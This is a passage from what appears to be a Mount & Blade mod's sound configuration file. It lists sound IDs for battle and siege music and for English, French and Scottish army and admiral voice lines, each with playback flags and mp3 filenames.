sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_6).mp3"]), ## ("eurob7", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_7).mp3"]), ## ("eurob8", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_8)_Vortex.mp3"]), ## ("eurob9", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_9)_Dangerous.mp3"]), ## #("eurob10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Camp_Battle_1)_Destiny.mp3"]), ## ("eurob11", sf_2d|sf_priority_15|sf_vol_10, ["(Teutonic_Battle)_Darker_Skies_Ahead.mp3"]), ## ##Sieges ## ("arabs1", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Mobilize_1)_High_Winds.mp3"]), ## ("arabs2", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Mobilize_2).mp3"]), ## ("arabs3", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Mobilize_3).mp3"]), ## ("arabs4", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Mobilize_4).mp3"]), ## ("arabs5", sf_2d|sf_priority_15|sf_vol_10, ["(Crusades_Mobilize)_Honour_Moment.mp3"]), ## #Mediterr & Arabs ## ("medis1", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_5)_Action.mp3"]), ## ("medis2", sf_2d|sf_priority_15|sf_vol_7, ["(Euro_Mobilize_9)_Feral_Chase.mp3"]), #This should be less volume than others. ## ##Euro ## ("euros1", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_1)_Sister_Davul.mp3"]), ## ("euros2", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_2)_Solenka.mp3"]), ## ("euros3", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_3)_This_is_it.mp3"]), ## ("euros4", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_4)_New_Arc_Ascending.mp3"]), ## ("euros5", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_6).mp3"]), ## ("euros6", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_7).mp3"]), ## ("euros7", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_8).mp3"]), ## ("euros8", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_10)_Tectonic.mp3"]), ## ("euros9", sf_2d|sf_priority_15|sf_vol_8, ["(Teutonic_Mobilize)_Hymn_Of_War.mp3"]), ## ("euros10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_11)_We_Got_Trouble.mp3"]), #####MUSICBOX END #Battle Music End #Misc ("objective_success", sf_2d|sf_priority_10|sf_vol_9, ["brittania_mission_arrived.mp3"]), #Used for feasts and byzantine empire reform roman empire ("notification_hostile", sf_2d|sf_priority_10|sf_vol_9, ["teutonic_mission_arrived.mp3"]), ("notification_center_lost", sf_2d|sf_priority_10|sf_vol_9, ["building_lost_battle.mp3", "player_lose_warning.mp3"]), ("choose_faction_menu", sf_2d|sf_priority_10|sf_vol_7, ["change_faction.mp3"]), ## #("result_won_battle", sf_2d|sf_priority_10|sf_vol_7, ["rebels_victorious.mp3", "infantry_group_celebrate_small_01.mp3","infantry_group_celebrate_large_01.mp3"]), #("result_lost_battle", sf_2d|sf_priority_10|sf_vol_7, ["players_army_destroyed.mp3"]), #####Cultural Speeches begin #("euros10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_11)_We_Got_Trouble.mp3"]), #("euros10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_11)_We_Got_Trouble.mp3"]), #("euros10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_11)_We_Got_Trouble.mp3"]), #("euros10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_11)_We_Got_Trouble.mp3"]), #("euros10", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Mobilize_11)_We_Got_Trouble.mp3"]), #########Factional & King ("engfk_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacked_Enemy_1.mp3","English_Admiral_Attacked_Enemy_2.mp3","English_Admiral_Attacked_Enemy_3.mp3"]), ("engfk_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacking_1.mp3","English_Admiral_Attacking_2.mp3","English_Admiral_Attacking_3.mp3"]), ("engfk_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Attacking_1.mp3","English_Army_Attacking_2.mp3","English_Army_Attacking_3.mp3","English_General_Fight_On_Battle_Map_Chivalry_2.mp3","English_Army_Fight_On_Battle_Map_6.mp3","English_Army_Fight_On_Battle_Map_1.mp3","English_Army_Fight_On_Battle_Map_2.mp3","English_Army_Fight_On_Battle_Map_3.mp3","English_Army_Fight_On_Battle_Map_4.mp3","English_Army_Fight_On_Battle_Map_5.mp3","English_General_Attacking_1.mp3","English_General_Attacking_2.mp3","English_General_Attacking_3.mp3","English_General_Attacking_Chivalry_1.mp3","English_General_Attacking_Chivalry_3.mp3","English_General_Attacking_Dread_1.mp3","English_General_Attacking_Dread_2.mp3","English_General_Attacking_Dread_3.mp3", "English_General_Attacking_Chivalry_2.mp3"]), ("engfk_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_lost_retreat_1.mp3","English_Army_Battle_lost_retreat_2.mp3","English_Army_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_1.mp3","English_General_Battle_lost_retreat_2.mp3","English_General_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_Chivalry_1.mp3","English_General_Battle_lost_retreat_Chivalry_2.mp3","English_General_Battle_lost_retreat_Chivalry_3.mp3","English_General_Battle_lost_retreat_Dread_1.mp3","English_General_Battle_lost_retreat_Dread_2.mp3","English_General_Battle_lost_retreat_Dread_3.mp3","English_General_Fight_On_Battle_Map_1.mp3","English_General_Fight_On_Battle_Map_2.mp3","English_General_Fight_On_Battle_Map_3.mp3","English_General_Fight_On_Battle_Map_Chivalry_1.mp3","English_General_Fight_On_Battle_Map_Chivalry_3.mp3","English_General_Fight_On_Battle_Map_Dread_1.mp3","English_General_Fight_On_Battle_Map_Dread_2.mp3","English_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("engfk_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_won_1.mp3","English_Army_Battle_won_2.mp3","English_Army_Battle_won_3.mp3","English_General_Battle_won_1.mp3","English_General_Battle_won_2.mp3","English_General_Battle_won_3.mp3","English_General_Battle_won_Chivalry_1.mp3","English_General_Battle_won_Chivalry_2.mp3","English_General_Battle_won_Chivalry_3.mp3","English_General_Battle_won_Dread_1.mp3","English_General_Battle_won_Dread_2.mp3","English_General_Battle_won_Dread_3.mp3"]), ("engfk_army_join", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Joins_Army_1.mp3","English_Army_Joins_Army_2.mp3","English_Army_Joins_Army_3.mp3","English_General_Joins_Army_1.mp3","English_General_Joins_Army_2.mp3","English_General_Joins_Army_3.mp3","English_General_Joins_Army_Chivalry_1.mp3","English_General_Joins_Army_Chivalry_2.mp3","English_General_Joins_Army_Chivalry_3.mp3","English_General_Joins_Army_Dread_1.mp3","English_General_Joins_Army_Dread_2.mp3","English_General_Joins_Army_Dread_3.mp3"]), ("engfk_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["English_General_Leaves_Army_1.mp3","English_General_Leaves_Army_2.mp3","English_General_Leaves_Army_3.mp3","English_General_Leaves_Army_Chivalry_1.mp3","English_General_Leaves_Army_Chivalry_2.mp3","English_General_Leaves_Army_Chivalry_3.mp3","English_General_Leaves_Army_Dread_1.mp3","English_General_Leaves_Army_Dread_2.mp3","English_General_Leaves_Army_Dread_3.mp3",]), ("engfk_capture", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Settlement_Capture_Celebration_1.mp3","English_Army_Settlement_Capture_Celebration_3.mp3","English_Army_Settlement_Capture_Celebration_2.mp3","English_General_Settlement_Capture_Celebration_1.mp3","English_General_Settlement_Capture_Celebration_2.mp3","English_General_Settlement_Capture_Celebration_3.mp3","English_General_Settlement_Capture_Celebration_Chivalry_1.mp3","English_General_Settlement_Capture_Celebration_Chivalry_2.mp3","English_General_Settlement_Capture_Celebration_Chivalry_3.mp3","English_General_Settlement_Capture_Celebration_Dread_1.mp3","English_General_Settlement_Capture_Celebration_Dread_2.mp3","English_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("engfk_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Begun_1.mp3","English_Army_siege_Begun_2.mp3","English_General_siege_Begun_1.mp3","English_General_siege_Begun_2.mp3","English_General_siege_Begun_Chivalry_1.mp3","English_General_siege_Begun_Chivalry_2.mp3","English_General_siege_Begun_Dread_1.mp3","English_General_siege_Begun_Dread_2.mp3"]), ("engfk_besieged", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Besieged_1.mp3","English_Army_siege_Besieged_2.mp3","English_Army_siege_Besieged_3.mp3","English_General_siege_Besieged_1.mp3","English_General_siege_Besieged_2.mp3","English_General_siege_Besieged_3.mp3","English_General_siege_Besieged_Chivalry_1.mp3","English_General_siege_Besieged_Chivalry_2.mp3","English_General_siege_Besieged_Chivalry_3.mp3","English_General_siege_Besieged_Dread_1.mp3","English_General_siege_Besieged_Dread_2.mp3","English_General_siege_Besieged_Dread_3.mp3"]), ("engfk_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Ongoing_1.mp3","English_Army_siege_Ongoing_2.mp3","English_Army_siege_Ongoing_3.mp3","English_General_siege_Ongoing_1.mp3","English_General_siege_Ongoing_2.mp3","English_General_siege_Ongoing_3.mp3","English_General_siege_Ongoing_Chivalry_1.mp3","English_General_siege_Ongoing_Chivalry_2.mp3","English_General_siege_Ongoing_Chivalry_3.mp3","English_General_siege_Ongoing_Dread_1.mp3","English_General_siege_Ongoing_Dread_2.mp3","English_General_siege_Ongoing_Dread_3.mp3"]), #French ("frenchfk_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacked_Enemy_2.mp3","French_Admiral_Attacked_Enemy_3.mp3","French_Admiral_Attacked_Enemy_1.mp3"]), ("frenchfk_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacking_1.mp3","French_Admiral_Attacking_2.mp3","French_Admiral_Attacking_3.mp3"]), ("frenchfk_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Attacking_2.mp3","French_Army_Fight_On_Battle_Map_1.mp3","French_Army_Fight_On_Battle_Map_3.mp3","French_Army_Fight_On_Battle_Map_5.mp3","French_General_Attacking_2.mp3","French_General_Attacking_3.mp3","French_General_Attacking_Chivalry_1.mp3","French_General_Attacking_Chivalry_2.mp3","French_General_Attacking_Dread_1.mp3","French_General_Attacking_Dread_3.mp3","French_General_Fight_On_Battle_Map_3.mp3","French_General_Fight_On_Battle_Map_Chivalry_1.mp3","French_General_Fight_On_Battle_Map_Dread_1.mp3","French_General_Fight_On_Battle_Map_Dread_2.mp3","French_General_Fight_On_Battle_Map_Dread_3.mp3","French_Army_Attacking_1.mp3","French_Army_Attacking_3.mp3","French_Army_Fight_On_Battle_Map_2.mp3","French_General_Attacking_1.mp3","French_General_Attacking_Dread_2.mp3","French_Army_Fight_On_Battle_Map_4.mp3","French_Army_Fight_On_Battle_Map_6.mp3","French_General_Attacking_Chivalry_3.mp3","French_General_Fight_On_Battle_Map_1.mp3","French_General_Fight_On_Battle_Map_2.mp3","French_General_Fight_On_Battle_Map_Chivalry_2.mp3","French_General_Fight_On_Battle_Map_Chivalry_3.mp3"]), ("frenchfk_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Battle_lost_retreat_1.mp3","French_Army_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_1.mp3","French_General_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_Chivalry_1.mp3","French_General_Battle_lost_retreat_Chivalry_2.mp3","French_General_Battle_lost_retreat_Chivalry_3.mp3","French_General_Battle_lost_retreat_Dread_1.mp3","French_General_Battle_lost_retreat_Dread_2.mp3","French_General_Battle_lost_retreat_Dread_3.mp3","French_Army_Battle_lost_retreat_3.mp3","French_General_Battle_lost_retreat_3.mp3"]), ("frenchfk_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["French_General_Battle_won_3.mp3","French_General_Battle_won_Chivalry_1.mp3","French_General_Battle_won_Chivalry_3.mp3","French_General_Battle_won_Dread_1.mp3","French_General_Battle_won_Dread_2.mp3","French_General_Battle_won_Dread_3.mp3","French_Army_Battle_won_1.mp3","French_General_Battle_won_2.mp3","French_General_Battle_won_1.mp3","French_General_Battle_won_Chivalry_2.mp3"]), ("frenchfk_army_join", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Joins_Army_1.mp3","French_Army_Joins_Army_2.mp3","French_Army_Joins_Army_3.mp3","French_General_Joins_Army_1.mp3","French_General_Joins_Army_3.mp3","French_General_Joins_Army_Chivalry_3.mp3","French_General_Joins_Army_Dread_1.mp3","French_General_Joins_Army_Dread_2.mp3","French_General_Joins_Army_Dread_3.mp3","French_General_Joins_Army_2.mp3","French_General_Joins_Army_Chivalry_1.mp3","French_General_Joins_Army_Chivalry_2.mp3"]), ("frenchfk_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Leaves_Army_1.mp3","French_Army_Leaves_Army_2.mp3","French_General_Leaves_Army_1.mp3","French_General_Leaves_Army_2.mp3","French_General_Leaves_Army_3.mp3","French_General_Leaves_Army_Chivalry_1.mp3","French_General_Leaves_Army_Chivalry_2.mp3","French_General_Leaves_Army_Dread_1.mp3","French_General_Leaves_Army_Dread_2.mp3", "French_General_Leaves_Army_Dread_3.mp3", "French_Army_Leaves_Army_3.mp3", "French_General_Leaves_Army_Chivalry_3.mp3"]), ("frenchfk_capture", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_Dread_1.mp3","French_General_Settlement_Capture_Celebration_Dread_3.mp3","French_Army_Settlement_Capture_Celebration_2.mp3","French_General_Settlement_Capture_Celebration_2.mp3","French_General_Settlement_Capture_Celebration_Chivalry_2.mp3","French_General_Settlement_Capture_Celebration_Dread_2.mp3","French_Army_Settlement_Capture_Celebration_1.mp3","French_General_Settlement_Capture_Celebration_1.mp3","French_General_Settlement_Capture_Celebration_Chivalry_1.mp3","French_General_Settlement_Capture_Celebration_Chivalry_3.mp3"]), ("frenchfk_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Begun_2.mp3","French_General_siege_Begun_1.mp3","French_General_siege_Begun_2.mp3","French_General_siege_Begun_Dread_2.mp3","French_Army_siege_Begun_1.mp3","French_General_siege_Begun_Chivalry_1.mp3","French_General_siege_Begun_Dread_1.mp3","French_General_siege_Begun_Chivalry_2.mp3"]), ("frenchfk_besieged", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Besieged_1.mp3","French_Army_siege_Besieged_2.mp3","French_General_siege_Besieged_1.mp3","French_General_siege_Besieged_2.mp3","French_General_siege_Besieged_Chivalry_1.mp3","French_General_siege_Besieged_Dread_1.mp3","French_General_siege_Besieged_Dread_2.mp3","French_General_siege_Besieged_Dread_3.mp3","French_Army_siege_Besieged_3.mp3","French_General_siege_Besieged_3.mp3","French_General_siege_Besieged_Chivalry_2.mp3","French_General_siege_Besieged_Chivalry_3.mp3"]), ("frenchfk_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Ongoing_1.mp3","French_Army_siege_Ongoing_3.mp3","French_General_siege_Ongoing_1.mp3","French_General_siege_Ongoing_2.mp3","French_General_siege_Ongoing_Chivalry_3.mp3","French_General_siege_Ongoing_Dread_2.mp3","French_General_siege_Ongoing_Dread_3.mp3","French_Army_siege_Ongoing_2.mp3","French_General_siege_Ongoing_3.mp3","French_General_siege_Ongoing_Chivalry_1.mp3","French_General_siege_Ongoing_Chivalry_2.mp3","French_General_siege_Ongoing_Dread_1.mp3"]), #French #########Factional Generic #Scotland ("scotfg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Admiral_Attacked_Enemy_1.mp3","Scottish_Admiral_Attacked_Enemy_2.mp3","Scottish_Admiral_Attacked_Enemy_3.mp3"]), ("scotfg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Admiral_Attacking_1.mp3","Scottish_Admiral_Attacking_2.mp3","Scottish_Admiral_Attacking_3.mp3"]), ("scotfg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Attacking_1.mp3","Scottish_Army_Attacking_2.mp3","Scottish_Army_Attacking_3.mp3","Scottish_Army_Fight_On_Battle_Map_1.mp3","Scottish_Army_Fight_On_Battle_Map_6.mp3","Scottish_General_Attacking_1.mp3","Scottish_General_Attacking_2.mp3","Scottish_General_Attacking_3.mp3","Scottish_General_Attacking_Chivalry_1.mp3","Scottish_General_Attacking_Chivalry_3.mp3","Scottish_General_Attacking_Dread_1.mp3","Scottish_General_Attacking_Dread_2.mp3","Scottish_General_Attacking_Dread_3.mp3","Scottish_General_Fight_On_Battle_Map_Dread_1.mp3","Scottish_General_Fight_On_Battle_Map_Dread_2.mp3","Scottish_General_Fight_On_Battle_Map_Dread_3.mp3" ,"Scottish_Army_Fight_On_Battle_Map_2.mp3","Scottish_Army_Fight_On_Battle_Map_3.mp3","Scottish_Army_Fight_On_Battle_Map_4.mp3","Scottish_Army_Fight_On_Battle_Map_5.mp3","Scottish_General_Attacking_Chivalry_2.mp3" ,"Scottish_General_Fight_On_Battle_Map_1.mp3","Scottish_General_Fight_On_Battle_Map_2.mp3","Scottish_General_Fight_On_Battle_Map_3.mp3","Scottish_General_Fight_On_Battle_Map_Chivalry_1.mp3","Scottish_General_Fight_On_Battle_Map_Chivalry_2.mp3","Scottish_General_Fight_On_Battle_Map_Chivalry_3.mp3"]), ("scotfg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Battle_lost_retreat_1.mp3","Scottish_Army_Battle_lost_retreat_2.mp3","Scottish_Army_Battle_lost_retreat_3.mp3","Scottish_General_Battle_lost_retreat_1.mp3","Scottish_General_Battle_lost_retreat_2.mp3","Scottish_General_Battle_lost_retreat_3.mp3","Scottish_General_Battle_lost_retreat_Chivalry_1.mp3","Scottish_General_Battle_lost_retreat_Chivalry_2.mp3","Scottish_General_Battle_lost_retreat_Chivalry_3.mp3","Scottish_General_Battle_lost_retreat_Dread_1.mp3","Scottish_General_Battle_lost_retreat_Dread_2.mp3","Scottish_General_Battle_lost_retreat_Dread_3.mp3"]), ("scotfg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Battle_won_1.mp3","Scottish_Army_Battle_won_3.mp3","Scottish_General_Battle_won_2.mp3","Scottish_General_Battle_won_3.mp3","Scottish_General_Battle_won_Chivalry_3.mp3","Scottish_General_Battle_won_Dread_1.mp3","Scottish_General_Battle_won_Dread_2.mp3","Scottish_General_Battle_won_Dread_3.mp3","Scottish_Army_Battle_won_2.mp3","Scottish_General_Battle_won_1.mp3","Scottish_General_Battle_won_Chivalry_1.mp3","Scottish_General_Battle_won_Chivalry_2.mp3"]), ("scotfg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Joins_Army_1.mp3","Scottish_Army_Joins_Army_2.mp3","Scottish_Army_Joins_Army_3.mp3","Scottish_General_Joins_Army_1.mp3","Scottish_General_Joins_Army_2.mp3","Scottish_General_Joins_Army_3.mp3","Scottish_General_Joins_Army_Chivalry_2.mp3","Scottish_General_Joins_Army_Chivalry_3.mp3","Scottish_General_Joins_Army_Dread_1.mp3","Scottish_General_Joins_Army_Dread_2.mp3","Scottish_General_Joins_Army_Chivalry_1.mp3","Scottish_General_Joins_Army_Dread_3.mp3"]), ("scotfg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Leaves_Army_1.mp3","Scottish_Army_Leaves_Army_2.mp3","Scottish_Army_Leaves_Army_3.mp3","Scottish_General_Leaves_Army_1.mp3","Scottish_General_Leaves_Army_2.mp3","Scottish_General_Leaves_Army_3.mp3","Scottish_General_Leaves_Army_Chivalry_1.mp3","Scottish_General_Leaves_Army_Chivalry_2.mp3","Scottish_General_Leaves_Army_Chivalry_3.mp3","Scottish_General_Leaves_Army_Dread_1.mp3","Scottish_General_Leaves_Army_Dread_2.mp3","Scottish_General_Leaves_Army_Dread_3.mp3"]), ("scotfg_capture", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Settlement_Capture_Celebration_1.mp3","Scottish_Army_Settlement_Capture_Celebration_3.mp3","Scottish_General_Settlement_Capture_Celebration_1.mp3","Scottish_General_Settlement_Capture_Celebration_3.mp3","Scottish_General_Settlement_Capture_Celebration_Chivalry_3.mp3","Scottish_General_Settlement_Capture_Celebration_Dread_1.mp3","Scottish_General_Settlement_Capture_Celebration_Dread_2.mp3","Scottish_General_Settlement_Capture_Celebration_Dread_3.mp3","Scottish_Army_Settlement_Capture_Celebration_2.mp3","Scottish_General_Settlement_Capture_Celebration_2.mp3","Scottish_General_Settlement_Capture_Celebration_Chivalry_1.mp3","Scottish_General_Settlement_Capture_Celebration_Chivalry_2.mp3"]), ("scotfg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_siege_Begun_1.mp3","Scottish_Army_siege_Begun_2.mp3","Scottish_General_siege_Begun_1.mp3","Scottish_General_siege_Begun_2.mp3","Scottish_General_siege_Begun_Chivalry_1.mp3","Scottish_General_siege_Begun_Chivalry_2.mp3","Scottish_General_siege_Begun_Dread_1.mp3","Scottish_General_siege_Begun_Dread_2.mp3"]), ("scotfg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_siege_Besieged_1.mp3","Scottish_Army_siege_Besieged_2.mp3","Scottish_Army_siege_Besieged_3.mp3","Scottish_General_siege_Besieged_1.mp3","Scottish_General_siege_Besieged_2.mp3","Scottish_General_siege_Besieged_3.mp3","Scottish_General_siege_Besieged_Chivalry_1.mp3","Scottish_General_siege_Besieged_Chivalry_2.mp3","Scottish_General_siege_Besieged_Chivalry_3.mp3","Scottish_General_siege_Besieged_Dread_1.mp3","Scottish_General_siege_Besieged_Dread_2.mp3","Scottish_General_siege_Besieged_Dread_3.mp3"]), ("scotfg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_siege_Ongoing_1.mp3","Scottish_Army_siege_Ongoing_2.mp3","Scottish_Army_siege_Ongoing_3.mp3","Scottish_General_siege_Ongoing_1.mp3","Scottish_General_siege_Ongoing_2.mp3","Scottish_General_siege_Ongoing_3.mp3","Scottish_General_siege_Ongoing_Chivalry_1.mp3","Scottish_General_siege_Ongoing_Chivalry_2.mp3","Scottish_General_siege_Ongoing_Chivalry_3.mp3","Scottish_General_siege_Ongoing_Dread_1.mp3","Scottish_General_siege_Ongoing_Dread_2.mp3","Scottish_General_siege_Ongoing_Dread_3.mp3"]), #Scotland ("engfg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacked_Enemy_1.mp3","English_Admiral_Attacked_Enemy_2.mp3","English_Admiral_Attacked_Enemy_3.mp3"]), ("engfg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacking_1.mp3","English_Admiral_Attacking_2.mp3","English_Admiral_Attacking_3.mp3"]), ("engfg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Attacking_1.mp3","English_Army_Attacking_2.mp3","English_Army_Attacking_3.mp3","English_General_Fight_On_Battle_Map_Chivalry_2.mp3","English_Army_Fight_On_Battle_Map_6.mp3","English_Army_Fight_On_Battle_Map_1.mp3","English_Army_Fight_On_Battle_Map_2.mp3","English_Army_Fight_On_Battle_Map_3.mp3","English_Army_Fight_On_Battle_Map_4.mp3","English_Army_Fight_On_Battle_Map_5.mp3","English_General_Attacking_1.mp3","English_General_Attacking_2.mp3","English_General_Attacking_3.mp3","English_General_Attacking_Chivalry_1.mp3","English_General_Attacking_Chivalry_3.mp3","English_General_Attacking_Dread_1.mp3","English_General_Attacking_Dread_2.mp3","English_General_Attacking_Dread_3.mp3"]), ("engfg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_lost_retreat_1.mp3","English_Army_Battle_lost_retreat_2.mp3","English_Army_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_1.mp3","English_General_Battle_lost_retreat_2.mp3","English_General_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_Chivalry_1.mp3","English_General_Battle_lost_retreat_Chivalry_2.mp3","English_General_Battle_lost_retreat_Chivalry_3.mp3","English_General_Battle_lost_retreat_Dread_1.mp3","English_General_Battle_lost_retreat_Dread_2.mp3","English_General_Battle_lost_retreat_Dread_3.mp3","English_General_Fight_On_Battle_Map_1.mp3","English_General_Fight_On_Battle_Map_2.mp3","English_General_Fight_On_Battle_Map_3.mp3","English_General_Fight_On_Battle_Map_Chivalry_1.mp3","English_General_Fight_On_Battle_Map_Chivalry_3.mp3","English_General_Fight_On_Battle_Map_Dread_1.mp3","English_General_Fight_On_Battle_Map_Dread_2.mp3","English_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("engfg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_won_1.mp3","English_Army_Battle_won_2.mp3","English_Army_Battle_won_3.mp3","English_General_Battle_won_1.mp3","English_General_Battle_won_2.mp3","English_General_Battle_won_3.mp3","English_General_Battle_won_Chivalry_1.mp3","English_General_Battle_won_Chivalry_2.mp3","English_General_Battle_won_Chivalry_3.mp3","English_General_Battle_won_Dread_1.mp3","English_General_Battle_won_Dread_2.mp3","English_General_Battle_won_Dread_3.mp3"]), ("engfg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Joins_Army_1.mp3","English_Army_Joins_Army_2.mp3","English_Army_Joins_Army_3.mp3","English_General_Joins_Army_1.mp3","English_General_Joins_Army_2.mp3","English_General_Joins_Army_3.mp3","English_General_Joins_Army_Chivalry_1.mp3","English_General_Joins_Army_Chivalry_2.mp3","English_General_Joins_Army_Chivalry_3.mp3","English_General_Joins_Army_Dread_1.mp3","English_General_Joins_Army_Dread_2.mp3","English_General_Joins_Army_Dread_3.mp3"]), ("engfg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["English_General_Leaves_Army_1.mp3","English_General_Leaves_Army_2.mp3","English_General_Leaves_Army_3.mp3","English_General_Leaves_Army_Chivalry_1.mp3","English_General_Leaves_Army_Chivalry_2.mp3","English_General_Leaves_Army_Chivalry_3.mp3","English_General_Leaves_Army_Dread_1.mp3","English_General_Leaves_Army_Dread_2.mp3","English_General_Leaves_Army_Dread_3.mp3",]), ("engfg_capture", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Settlement_Capture_Celebration_1.mp3","English_Army_Settlement_Capture_Celebration_3.mp3","English_Army_Settlement_Capture_Celebration_2.mp3","English_General_Settlement_Capture_Celebration_1.mp3","English_General_Settlement_Capture_Celebration_2.mp3","English_General_Settlement_Capture_Celebration_3.mp3","English_General_Settlement_Capture_Celebration_Chivalry_1.mp3","English_General_Settlement_Capture_Celebration_Chivalry_2.mp3","English_General_Settlement_Capture_Celebration_Chivalry_3.mp3","English_General_Settlement_Capture_Celebration_Dread_1.mp3","English_General_Settlement_Capture_Celebration_Dread_2.mp3","English_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("engfg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Begun_1.mp3","English_Army_siege_Begun_2.mp3","English_General_siege_Begun_1.mp3","English_General_siege_Begun_2.mp3","English_General_siege_Begun_Chivalry_1.mp3","English_General_siege_Begun_Chivalry_2.mp3","English_General_siege_Begun_Dread_1.mp3","English_General_siege_Begun_Dread_2.mp3"]), ("engfg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Besieged_1.mp3","English_Army_siege_Besieged_2.mp3","English_Army_siege_Besieged_3.mp3","English_General_siege_Besieged_1.mp3","English_General_siege_Besieged_2.mp3","English_General_siege_Besieged_3.mp3","English_General_siege_Besieged_Chivalry_1.mp3","English_General_siege_Besieged_Chivalry_2.mp3","English_General_siege_Besieged_Chivalry_3.mp3","English_General_siege_Besieged_Dread_1.mp3","English_General_siege_Besieged_Dread_2.mp3","English_General_siege_Besieged_Dread_3.mp3"]), ("engfg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Ongoing_1.mp3","English_Army_siege_Ongoing_2.mp3","English_Army_siege_Ongoing_3.mp3","English_General_siege_Ongoing_1.mp3","English_General_siege_Ongoing_2.mp3","English_General_siege_Ongoing_3.mp3","English_General_siege_Ongoing_Chivalry_1.mp3","English_General_siege_Ongoing_Chivalry_2.mp3","English_General_siege_Ongoing_Chivalry_3.mp3","English_General_siege_Ongoing_Dread_1.mp3","English_General_siege_Ongoing_Dread_2.mp3","English_General_siege_Ongoing_Dread_3.mp3"]), #French ("frenchfg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacked_Enemy_2.mp3","French_Admiral_Attacked_Enemy_3.mp3"]), ("frenchfg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacking_1.mp3","French_Admiral_Attacking_2.mp3"]), ("frenchfg_army_attack", sf_2d|sf_priority_10|sf_vol_7, 